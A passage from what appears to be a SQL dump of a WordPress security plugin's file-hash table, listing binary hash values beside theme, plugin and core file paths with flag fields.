E�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('�hWj���V�&�&6�','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĉ��/y\'�\ZD��','6�3�!(�Nd�\"��u��\0��p+�^)}`�Ü$�','',0,'?'),('���t�DX�m\0#�(�','wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��]σ��2+fX','Ѵg�h��m�s�ꄑ��-vmQ�Ij�\Z]sQT9�m','',0,'?'),('��@�q���\r��nL','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-code-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+2d�6mܙ�F@','����:&���רC*�C\nJ�U���g�f��~�','',0,'?'),('��]/~���q��XŎE','wp-includes/js/jquery/ui/button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('�E��Ԁ�p�֎���','wp-content/themes/graphene/images/headers/fireworks.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hH����Dq��l�','�pS�]Z��È����o7}���y`�:�t��U','',0,'?'),('���L?\n�\n���x��@','wp-content/plugins/wp-cerber/assets/flags/al.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#����S�{r<�','����G�U0<>�.]fX�[I���\0����7','',0,'?'),('�ʁ�zU�w�1','wp-content/themes/catch-responsive/js/source/jquery.cycle/jquery.cycle2.flip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�O��+�3c\'8�݉�','�\\_��66kQWI��`��	%�����Q���I��V','',0,'?'),('��V2���K��U��','wp-content/themes/wp-simple/inc/kirki/kirki/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jמ�^��~p\\t��','�|XC��U�,.���\n����]+M (K�u�c�','',0,'?'),('@O\'m����Ė(o1�o','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/img/posts_column.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Gu���\'����v�','���9��P~���\"gE\0����9#eu��葧��','',0,'?'),('B�@�R*G�xF4N}','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�_�?Sş\Z]�y�','�6��[-�,9YR�r�\rY\"-��an�6$�','',0,'?'),('P�*�^��ՑR̹k','wp-content/themes/Yegor/FT/plugin/updater.php',0,'uc3\\����[\'�N�9�','uc3\\����[\'�N�9�','Q�s�=\\Eؐ�@���\0EF�r�^Do���\\','',0,'?'),('R�\\�&��T	�|`','wp-includes/class-wp-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��b�Zd��	��','���mA�QW,�?�;��w�FT񎧳\\>��','',0,'?'),('gH�};\nC�fF`�@','wp-content/themes/quicksand/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�������\\J��w',',N%����l�!5�Pl�+�t�(���&wN�','',0,'?'),('n��t\0;ʢ�����N','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-group-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';6����b�ؑ��jz\'R','��r�s�,�1=e�S{��i� �i�0~��n','',0,'?'),('ynm�;�/�UsK	��','wp-includes/css/wp-embed-template-ie.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7{WP�L�{H���I�','\\aWq1��+��Я�o�L�Y\0�„K���%<','',0,'?'),('|�&;�r�Ls5��','wp-admin/includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I|��lu�D�','�� \r���B�%�F�V}[�j�7CF�A�','',0,'?'),('��m�(䍪�W���','wp-content/themes/quicksand/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�����|T�L��J','bd���촉݈����f!3���@�,��g','',0,'?'),('���Ye�.�0s��','wp-admin/includes/class-wp-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�Kt�Jr�\"�-*�','7�d�i}k�4��+)�[��-L�4�uR_O�<Ѩ�','',0,'?'),('��9�8V3l�Ʈ���\\','wp-content/themes/wp-simple/assets/images/preview/deer.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ǰ�#�ݵ�!G:$','�כ��s�\ZޠP+G��r�5����II���','',0,'?'),('�A�o\r�ZԔ_�t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~�xT-4�ZK��3','�>|k��\\~/n8�	9��i�+vT��[s','',0,'?'),('��\'-�p�-��f�','wp-admin/css/l10n-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xmǏ|�s���A�',']��%FL�\nI�L��l���f426G��\'��','',0,'?'),('��j�ֹJ����0Y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�0W\"F)����8O�','�5���)&��BoK]���ػ��rm`%��h�O','',0,'?'),('�Q%rT>�!�e_zE��','wp-content/themes/twentytwentyone/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��Տ,;�\"��]&�','\'�ߍ���\0�`q���ֶp�~�r�I�{��','',0,'?'),('�#�jE�C�\n���R��','wp-content/themes/Kent/js/superfish.js',0,'��\\𦧋u�cw>L','��\\𦧋u�cw>L','�h�pk�t{o��J�:o����	J�(��*�LS','',0,'?'),('چ�q*����>O}��','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/fold/comment-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���������y�','�kl��XOQwºILE)�#b�M}3y��m�','',0,'?'),('�\"�<	i�t��&�','wp-admin/css/colors/modern/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�̯��R�j�F�','24�ރ�ki<��u&�*��7�U�s��=~��F�','',0,'?'),('��	e`��:�R��','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/font-awesome.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�UY!mTc\n��aƸ=','\'����:;�U��\"k�M�#�I@�+y��_�','',0,'?'),('�]t�y�5���\'�c','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2mqIEӢ��S�Z','ok8��m&3\Zz9���x3w,f1�ML�s','',0,'?'),('�9���x%\"�o���','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bG\Z^y	��7\\sLd^7','#zR������:��+zb)��������~�','',0,'?'),('�</Io�*����B','wp-content/themes/graphene/images/headers/sparkle.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�0�D�ň8���}','*ڈNfQ�_�t}̼f��~ūY:7t�C�','',0,'?'),('��]GY�%���SC�Y','wp-content/themes/singularity/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\'\0\'WO�^c~ ��j','ahy�K���5͆��Uhz��ӣ�W�ڙ:�6','',0,'?'),('��B���B�����4�h','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-color-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��•\0���\Z����O','��K�!�l�̞�<�w�G	�x6����A\0fj','',0,'?'),('�\"�������+��','wp-content/themes/catch-flames/inc/catchflames-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��0���;�9��#q','��\rW1�5+5G�y�����L\nn��E;�?0�','',0,'?'),('6�.�������m��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/javascript/json-ld.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԕ��_,�J`*\rO��y','p	8M��0���?H�fM�����\0}v�K����','',0,'?'),('9�k�ɽ �JZ��<','wp-content/themes/twentytwenty/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�G�I\"�+����','�����C��eĻ�3�q�9qR�0�a�J�','',0,'?'),('K����TW�.��(�I','wp-content/themes/hitmag/inc/kirki/assets/images/1c.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʦ�e3�U�k�$','�ː)��͑`�Pb��L����E��C���','',0,'?'),('L��bP�-I׭1f�','wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��<w�!��1','q�2�յ��Ϣ>r�7Nj��	D�^��A5\r','',0,'?'),('N�d#R��+��r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?ue�wD�:��E�','��ζ�\Z��)v���vG��,�h�/�ӈ�','',0,'?'),('QzXį�A\rq�$�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/textile/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����%\\=��<_�','Kᑈ++�^=��l}M�����~��b\"���','',0,'?'),('RL�,�����	|�','wp-content/themes/graphene/images/social/spotify.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e#�N�N�!�\n�-','h�>㣃�}Ma��}�:����{j��\"�qw��','',0,'?'),('t������!�\Z�%\n','wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('{�~��rb�\\B��%�','wp-content/plugins/wordfence/css/dt_table.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gJbj�J��9�k:�','o[P�HyЊ}���iGc�~��<c�D�R:D�','',0,'?'),('|�C��rW���9&��','wp-content/themes/graduate/inc/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UCo�T(n+�\r�-�yV�','���B�lx]���k:Wpx�e���EY�jʬ�Ƿ','',0,'?'),('~�ڄ}������ҳ\'','wp-content/themes/advance/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1YWǒ��u�GO�\n','P�#c�qAR��9%S۵QL���}q<Sw�!E�','',0,'?'),('�L��\"�G�ʄ/\nN�','wp-admin/images/privacy.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ҟ�ݘ���ӽ�}�','qO.���x&��*p���@��l����Β/k','',0,'?'),('�{��Y�\\�z錿�}c','wp-includes/images/smilies/rolleyes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���O�2�Ofݣi�','fK�)�\n�d��!]\r)��\\}���זl�^��','',0,'?'),('�T�W��ł�$6?7&�','wp-content/themes/hitmag/inc/kirki/assets/js/controls/number.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��;�d�|��^�-�','��A�\r�B@�?X�����F*��Ѹ���','',0,'?'),('�4*l�{��\\�%���','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1۸ꦻ;��qB�m','�/�;!2��\\2�h�9D�DvZt:F�Ӻ�%','',0,'?'),('�,5D��+_)H>�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/mode/overlay.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z����\0�T��T','tH�J�)(�X����?���N`dj�WE��','',0,'?'),('��`���<k$�Z�','wp-content/themes/Yegor/ft-options.php',0,'\0T�Իe]�!����T','\0T�Իe]�!����T','0	����;M��(O�km�nGb�Z��L~�\"S�','',0,'?'),('�z#�t�5*�k7','wp-content/themes/exoplanet/images/exoplanet-small-bricks.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W.�w���\Z�ibS��','���La�A�.�J[�	M���9�d�\\G��\'j�','',0,'?'),('���-� ��\"\"F6','wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^<�|%z�A�M�U<�','���ҟ�q�v@, C�1�4�-����zd,�P�','',0,'?'),('���ce�뻋�?�','wp-content/themes/gildrest/template-parts/single/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�Aw��0cxHTD��','�B�h(�\0��}��i�\"6��\0�n¾ձ','',0,'?'),('��ܥ�#s�	.f�*','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/javascript/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ٺĠ`58��%�#','�LZV�2H:,%�F�8����\0��2�K�h�o��','',0,'?'),('�G�_�ǵrUn���','wp-content/themes/graphene/admin/options-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>)%�+��y&���h','���A�≮c�͋2���Y,���߶����','',0,'?'),('�|�a�T�\0f�5�','wp-content/themes/simpleshift/parts/companion/frontpage-about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��G*6;�Z�',']΃ݗ�{���;]��)o��O�}�','',0,'?'),('�?�\0��l����.�','wp-includes/class-wp-application-passwords.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�Q����cW�M7A','��x���� �?��L�\Z�l�C�\"���Ǵ��','',0,'?'),('�2p)��t��I��','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���\0�\">y>=����','xVQ/}�琾:(3&���%�U��Jo��C','',0,'?'),('���z�|%�\\k	c�','wp-content/themes/Endolf/inc/ticker.php',0,'�{�!��}	kc�ݘ�{g','�{�!��}	kc�ݘ�{g','[�3j�[Y�2	7\\��f�(m�s�j{�u60�','',0,'?'),('�����o�Rb��','wp-includes/js/dist/url.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bͻ�:�[P�XpXα','pʼn�\0oŖ���c�^f��$l�Б�zƝ','',0,'?'),(' Łq\Z��{��>�d-','wp-content/plugins/wp-cerber/assets/flags/mt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z\n�r�CZ2���Y��','X�g�����a�-\0s!�\nZF�>X��\Z','',0,'?'),(' �es(N^���+q�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�MEƱ��(����(','E��a�\r�f U�DLb�V�ҪW#s�s��','',0,'?'),(' %S�ɺ����<�(Hz','wp-content/themes/quicksand/css/quicksand-jupiter-jazz.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��^��k��d:̠��&','M8%��8��^(qƁ�+�K׈\\L��ۃ�y','',0,'?'),(' \'���_U;0�/<�','wp-admin/includes/class-bulk-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�:y�x1s)����','�Ϲ���ݶ1SXCTڼ�<�ڊh`���V','',0,'?'),(' *@ADғ�=pu���E','wp-admin/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W2#	�3�','8庹���R0H����m�я�Ȯ�Я&m','',0,'?'),(' 0D��5br*��\0=!','wp-content/themes/chronus/inc/widgets/widget-magazine-posts-grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rd�����g���','�k�B��‚�Q紿Q�Ӳ�Ƭ��cH1�A','',0,'?'),(' 5��rD�g�籃�','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IT�愭��,�;_','��@��q��>G�C�|�U��sC��p���','',0,'?'),(' 6<��6V\Zn�e�!��','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/sortable.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��?7��|nq;T�','`#ó��ːŘ3f6�b��0�;����,���J','',0,'?'),(' :�����֡��k�i�>','wp-content/themes/wp-simple/inc/kirki/includes/output/control/class-kirki-output-control-spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v���W>�r�����','P�b�2-��C���m\rd�\0�fZUGi�p/[�','',0,'?'),(' <@�s����\r��F��/','wp-includes/Requests/Exception/HTTP/305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),(' =ېW��]6���^�','wp-content/themes/graduate/assets/js/unminified/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^鐐{1P\'�`���K','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),(' V��K+�L\Z*!���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:jC�o\0\"��R�','*(��P�0eU�����!7p�Y�v��3','',0,'?'),(' YR��{��˪.�<','wp-content/themes/graphene/images/social/wordpress.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��_;C�PAz�','	E��9i���\n�~�퓗�̥�!ԠԺ\Z','',0,'?'),(' ]�r���W�7:\r�U','wp-content/themes/gildrest/lib/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',	mk��|�i���]','��p�%�RwYB�D����kPs9���D','',0,'?'),(' u�a�0YxV\"��','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/multicheck.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�q~t\\m9:?Z�','��CSe��yC:ү|��۩J4�$�Ji�w!\0(c','',0,'?'),(' |=��t�xMV�J�$','wp-content/themes/newsmag/assets/vendors/machothemes/components/styleselects.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AM��IJ�3u�n�P�','�s��}��SC�_����!��S��>X�','',0,'?'),(' ��C��N��4h�l�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/kirki-dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�x�Ώl����^�h','m�� ��U�W-ar�T���(�Z�bp�/D�O','',0,'?'),(' �\"}��NY���S��','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/code.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}4��%8�H�+��v�','�� uAO}ؒ�\\FB\\����>�ص���','',0,'?'),(' �RB�;b:�$5�4��','wp-content/themes/singularity/page-narrow-column.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?v@��ເD��sY;','�7����n y�#_�|w\r��(z��f�7','',0,'?'),(' �M��$�d���M\n','wp-content/themes/wp-simple/inc/kirki/includes/output/class-kirki-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P/U@�L)�=V','��@ow����YNtqW~��e�߇�X^aiH','',0,'?'),(' �\n��3�3�)\'sS=�','wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��(J��D�T','G<��k<eL�Q|�#��Bޭ��+77��=т�','',0,'?'),(' �Gz2�Y2-���','wp-content/themes/auberge/template-parts/loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��7��f�V�\"ʴf','oM�7�kP�O�o��x1�$�1?�\n�Ӊ�e��','',0,'?'),(' ���=����g�V�|�','wp-content/themes/twentytwenty/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xM�ɞx���x�','���/�Ç�:�&�s�ۃu ���^&H','',0,'?'),(' �G�ʴ��Gtؑ��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oū3�(	ia�Y���(','����%��\Z0b��[u�#�v.�_��	O�=0','',0,'?'),(' �m�qO�J{J3q�,','wp-content/themes/catch-flames/js/jquery.cycle.source/jquery.cycle2.scrollVert.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$\r�����{��ui�','-�Ċ�-�}�?�1�ףsS�l����s4�','',0,'?'),(' �z�z{����L��H','wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),(' ��ٔG�D��q$*','wp-content/themes/graduate/inc/customizer/upgrade-to-pro/class-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#\\(�Ը��iuh;#�z','p	�L���y�H?X�}\'���� ,�3���hw','',0,'?'),(' ��ޓP��:>T�#�','wp-content/themes/metro-magazine/inc/customizer/ads.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}o�\0�\nDž�@�j���','ga:x7�/�\r�\"=}��I+5w�RHQT_�1','',0,'?'),(' �\r$	Q�^C(����','wp-includes/Requests/Exception/HTTP/505.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]A	3�[/Cd���','��⭛� i�{�PA�͆k���d���M\n���','',0,'?'),(' �A�1����uK���','wp-content/themes/auberge/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':5�.N�/1m�\r}�','-�j���\n���2�:�����0�W~�','',0,'?'),(' ܃�i�x���8�Zr�','wp-content/themes/quicksand/css/quicksand-jupiter-jazz.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!�k9HD�X!`]��','f��?�F�2��n�fyй�%��^��PG`ra�','',0,'?'),(' ��c̫)I�\np,͑��','wp-includes/css/jquery-ui-dialog-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),(' ��p��E�4q�&?J�','wp-content/plugins/wp-cerber/assets/flags/im.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),(' ���Q_8�I_+�','wp-content/themes/wp-simple/parts/frontpage-social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�y�R]wZ��V�1[','��  ��O_��~�-��@z2\\��q����}��','',0,'?'),(' ��j��\Z�x�O1e','wp-content/themes/university-hub/third-party/sidr/js/jquery.sidr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2IT\'�L�SvDH�	��','�,�y�]�D��@[p��]��E�L��4bS','',0,'?'),('!\0QӋǻ��^a�P$��','wp-content/themes/hemingway/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�a��u ����؉','�]�����S\r�ڕ�&�.�y\n�:$��~�U	�','',0,'?'),('!\n�φ\r��\Z<�\\�C�','wp-admin/css/index.php',0,'����i�j�>ֱ �','����i�j�>ֱ �','�[�T�n�Ejd�(�$�:!�h�Ν\0�s�><','',0,'?'),('!o�\r��A��v7��e','wp-admin/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t&���V�݁6�ָ','mcT)��Ҝ�O>y�n/@i\"+�5dJ��@���','',0,'?'),('!�ň�K��HI͑�?','wp-content/themes/saybusiness/inc/upsell/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Ve���)�d�.\'','���|N�	�@X����B����}Z��`C','',0,'?'),('!\\��|���{��`0','wp-content/themes/graduate/inc/customizer/upgrade-to-pro/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lA�h�����~�','���SL�=W.?,M��Mu?Q��t�U���','',0,'?'),('!1b݅9��*�\\��','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R��#�ttIrzX�K','Vo�梌>�)�x����Z���EB�O��','',0,'?'),('!I�d]5$���[��~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��L�� k\'k1��','��1�\\�Qt�*���J���%���s��&','',0,'?'),('!Plu6�������CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P���e��1','T���*��+���z]ʜ;>�\n�3���]?x�','',0,'?'),('!_��輵p3p�n��L','wp-includes/images/smilies/icon_eek.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('!j�y��G\r�\\��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/scroll/scrollpastend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�m��z�f������','.�ik�N���ܱ�@�?*Cϲ�Qp��X���*','',0,'?'),('!z?�w8�^�ș�','wp-content/themes/advance/inc/kirki/assets/css/select2.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!G�r�v[�Z�l )�','s��@�؜�#�h�rER0}��	A�1#Z��K�','',0,'?'),('!|(�y�W�*1Oo2Cu','wp-includes/js/wp-api.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő�	2&�H','',0,'?'),('!�8y@����o���S#�','wp-content/themes/graphene/images/social/plaxo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y2�s�LW<���M�','���*�8��7���w�S%ݥ]&@ø','',0,'?'),('!�UE�����Ο�VϋQ','wp-content/themes/gambit/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�li|݄��Qh��I','�3�P�C�����3f����|�t!/��ܢ','',0,'?'),('!��xx�+!���[�(','wp-includes/js/dist/list-reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��|�eɤs^�Q�','���f��i7� �L�:��r;�8\"�h<s�P�','',0,'?'),('!�w<���A\n�@�O','wp-includes/js/dist/hooks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<q@o�P��u����','+���(�������d��C%�\'��\Z��v��NR','',0,'?'),('!�)�����%���>0�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/php/php.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����́}\0� �b?�7�','���ZO*Ny�����K��g��D\"����q','',0,'?'),('!��y��\'U��b��#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zY��衆:��Lk','3`R<��!���0)B��W�gH�Z��','',0,'?'),('!�o�-$(TgHJ��Ԅ','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-custom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w4z�:/X��(�X�','��aⓦhU�H �\r#j�⽋0!�;YD�k�','',0,'?'),('!�zϞ+�2_B�{:D�','wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-media-uploader.php',0,' 3r7z��Vy�g �X��',' 3r7z��Vy�g �X��','Nٝ�cǐ�%�QQ�^�p���h�j:r���ӯ','',0,'?'),('!�##sw:\rH*�$q�','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�u$�j�6�uwq�t�','�r\"��(�-w�a$A�2\"�7��\\��Vb�','',0,'?'),('!��2�_xON�+hTTH�','wp-content/themes/event/inc/upgrade-plus/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�ܑ*��\Zox�QaN&','�|8���8?�\\-����\Z`�����7�Y��','',0,'?'),('!����x�\Z�0�e�','wp-content/themes/university-hub/third-party/font-awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ʔ�q�3��[�','���qa#T0��T�n=���8X\n�Bg%΀L�','',0,'?'),('!�2�E�[E�]�','wp-content/themes/catch-flames/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��\0� 